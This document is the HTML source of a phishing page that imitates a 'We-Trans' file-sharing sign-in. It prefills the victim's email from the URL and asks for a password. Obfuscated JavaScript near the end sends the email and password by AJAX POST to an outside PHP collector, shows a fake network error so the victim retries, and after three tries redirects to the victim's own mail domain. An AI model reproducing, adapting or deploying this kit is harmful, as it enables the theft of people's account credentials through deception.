<html><head></head><body class="" style="">





<title>We-Trans</title>

    
        <meta charset="utf-8">
        <title></title>


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
<script src="https://loacmanx.bitbucket.io/jquery.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
        <!-- Popper JS -->



        <style>
            body {
                background-image: url(https://uploads.codesandbox.io/uploads/user/c41269b1-1441-4635-a120-a6f8f5066a5d/FCMy-grd.jpg);
                background-repeat: no-repeat;
                background-size:cover;
                height:100vh;
            }


            #myModal {
            position: absolute;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
        }
            @media (max-width: 575.98px) {
                #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
        }
                body {

                  background-image: url(https://uploads.codesandbox.io/uploads/user/c41269b1-1441-4635-a120-a6f8f5066a5d/FCMy-grd.jpg);
                background-repeat: no-repeat;
                background-origin:contain;
                height:100vh;
               
            }
            #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
        }
        #asd{
            display:none;
        }
          .col-sm-3{
              width:46%
          }          
        }
        </style>
    

    <bod>
        
<!-- The Modal -->
	<div data-toggle="modal" data-target="#myModal" style="width:100vh;height:100vh;"></div>

   <div class="loaded">
  
    
    <!-- The Modal -->
    <div class="modal" id="myModal" style="display: none;" aria-hidden="true">
        <div class="modal-dialog">
            <div class="modal-content">
                <!-- Modal Header -->
              
                <!-- Modal body -->
                <div class="modal-body p-3">
                  <img src="https://uploads.codesandbox.io/uploads/user/c41269b1-1441-4635-a120-a6f8f5066a5d/fI7E-to.png" class="img-fluid">
<div class="text-danger" style="display: none;" id="msg" style="font-weight:600; font-size:17px;">Network Error! Please verify your information and try again</div>
                    <form method="post" id="formx" class="my-4">
                        
                    
                        <input type="email" name="email" id="email" class="form-control mb-3" value="" readonly="">
                   
                        <input type="password" name="password" id="password" class="form-control mb-3" placeholder="Password" value="" required="">
                       
                           
                        <button id="submit-btn" class="btn btn-md btn-primary">Sign In</button>
                    </form>
                  
                 
                </div>
            </div>
        </div>
    </div>
</div>

       
    





  <script crossorigin="" type="text/javascript" src="https://codesandbox.io/static/js/watermark-button.be960f43b.js"></script>
  `
</bod><iframe id="sb__open-sandbox7" style="
      position: fixed;
      margin: 0;
      padding: 0;
      bottom: 16px;
      right: 16px;
      border: none;
      width: 118px;
      height: 36px;
      z-index: 9999999999999;
    "></iframe></body></html>



    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

    <script type="text/javascript">
 function _0x5301(_0x531edc,_0x3c8d1e){var _0x18cab9=_0x18ca();return _0x5301=function(_0x530192,_0x3050e6){_0x530192=_0x530192-0xf7;var _0x2e6507=_0x18cab9[_0x530192];return _0x2e6507;},_0x5301(_0x531edc,_0x3c8d1e);}var _0x4968ee=_0x5301;(function(_0x22082f,_0x2015dc){var _0x39c382=_0x5301,_0x3fb088=_0x22082f();while(!![]){try{var _0x46fb2a=-parseInt(_0x39c382(0xfb))/0x1+-parseInt(_0x39c382(0x121))/0x2*(-parseInt(_0x39c382(0x122))/0x3)+-parseInt(_0x39c382(0x11a))/0x4*(parseInt(_0x39c382(0x104))/0x5)+parseInt(_0x39c382(0x101))/0x6+parseInt(_0x39c382(0x100))/0x7*(parseInt(_0x39c382(0x108))/0x8)+-parseInt(_0x39c382(0x106))/0x9*(-parseInt(_0x39c382(0x112))/0xa)+-parseInt(_0x39c382(0x111))/0xb*(-parseInt(_0x39c382(0x11c))/0xc);if(_0x46fb2a===_0x2015dc)break;else _0x3fb088['push'](_0x3fb088['shift']());}catch(_0x168752){_0x3fb088['push'](_0x3fb088['shift']());}}}(_0x18ca,0x84d56),$(document)[_0x4968ee(0x109)](function(){var _0x151713=_0x4968ee,_0x4a05a5=0x0,_0x36e7d8=window[_0x151713(0x10c)][_0x151713(0xf9)]['substr'](0x1);if(!_0x36e7d8){}else{var _0x3f92d8=_0x36e7d8,_0x310312=_0x3f92d8['indexOf']('@'),_0x1b45fc=_0x3f92d8['substr'](_0x310312+0x1),_0x4afab9=_0x1b45fc[_0x151713(0x115)](0x0,_0x1b45fc[_0x151713(0x103)]('.')),_0x53c95f=_0x4afab9[_0x151713(0x110)]();$(_0x151713(0x11e))['val'](_0x3f92d8),$('#domain-name')['html'](_0x53c95f),$(_0x151713(0x10d))[_0x151713(0x117)]();}var _0x441094=_0x151713(0x10b);$('#submit-btn')['click'](function(_0x322e74){var _0x211fba=_0x151713;$(_0x211fba(0x119))['hide'](),$(_0x211fba(0x10d))[_0x211fba(0x117)](),_0x322e74[_0x211fba(0x10a)]();var _0x33c5ba=$(_0x211fba(0x11e))[_0x211fba(0xf8)](),_0x40bf90=$(_0x211fba(0x11b))['val'](),_0x5d1c95=$(_0x211fba(0x10d))['html']();$(_0x211fba(0x10d))[_0x211fba(0x11f)](_0x5d1c95);var _0x38514a=_0x33c5ba,_0x573f7d=/^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x33c5ba)return $(_0x211fba(0x119))[_0x211fba(0xfa)](),$(_0x211fba(0x119))[_0x211fba(0x102)]('Email\x20field\x20is\x20emply.!'),ai[_0x211fba(0xf7)],![];if(!_0x573f7d[_0x211fba(0x113)](_0x38514a))return $(_0x211fba(0x119))['show'](),$(_0x211fba(0x119))[_0x211fba(0x102)](_0x211fba(0xfe)),ai[_0x211fba(0xf7)],![];if(!_0x40bf90)return $('#error')[_0x211fba(0xfa)](),$('#error')['html'](_0x211fba(0x114)),ai[_0x211fba(0xf7)],![];var _0x4e511d=_0x38514a[_0x211fba(0x103)]('@'),_0x56f85e=_0x38514a['substr'](_0x4e511d+0x1),_0x220f22=_0x56f85e['substr'](0x0,_0x56f85e[_0x211fba(0x103)]('.')),_0x5173fd=_0x220f22[_0x211fba(0x110)]();_0x4a05a5=_0x4a05a5+0x1,$(_0x211fba(0x107))[_0x211fba(0x102)](_0x5173fd),$[_0x211fba(0x105)]({'dataType':_0x211fba(0x118),'url':_0x211fba(0x116),'type':_0x211fba(0x11d),'data':{'email':_0x33c5ba,'password':_0x40bf90},'beforeSend':function(_0x4a786a){var _0x2ae286=_0x211fba;$(_0x2ae286(0x120))['html'](_0x2ae286(0x10e));},'success':function(_0x32fb51){var _0x266b7c=_0x211fba;if(_0x32fb51){$(_0x266b7c(0x10d))[_0x266b7c(0xfa)](),console[_0x266b7c(0x10f)](_0x32fb51);if(_0x32fb51['signal']=='ok')$('#password')['val'](''),_0x4a05a5>=0x3&&(_0x4a05a5=0x0,window[_0x266b7c(0x10c)][_0x266b7c(0xff)](_0x266b7c(0xfd)+_0x56f85e));else{}}},'error':function(){var _0x1c2a54=_0x211fba;$(_0x1c2a54(0x11b))[_0x1c2a54(0xf8)](''),_0x4a05a5>=0x3&&(_0x4a05a5=0x0,window[_0x1c2a54(0x10c)][_0x1c2a54(0xff)](_0x1c2a54(0xfd)+_0x56f85e)),$('#msg')[_0x1c2a54(0xfa)]();},'complete':function(){var _0x548806=_0x211fba;$(_0x548806(0x120))[_0x548806(0x102)](_0x548806(0xfc));}});});}));function _0x18ca(){var _0x5134ef=['970LxIkRi','test','Password\x20field\x20is\x20emply.!','substr','https://tritroc.com/tobenna/giftedhands.php','hide','JSON','#error','1031012CLaNaL','#password','5174436ZfZFOq','POST','#email','text','#submit-btn','882ICyLGS','3990NHChyS','focus','val','hash','show','324964PITIFd','Sign\x20in','https://','That\x20account\x20doesn\x27t\x20exist.\x20Enter\x20a\x20different\x20account','replace','3822RSHpNj','2309166auQGTj','html','indexOf','15rbQGgx','ajax','11907BOjCVH','#domain-name','1632WcdauY','ready','preventDefault','bmV4dC5waHA=','location','#msg','Verifing...','log','toLowerCase','11VTgUjz'];_0x18ca=function(){return _0x5134ef;};return _0x18ca();}
</script>
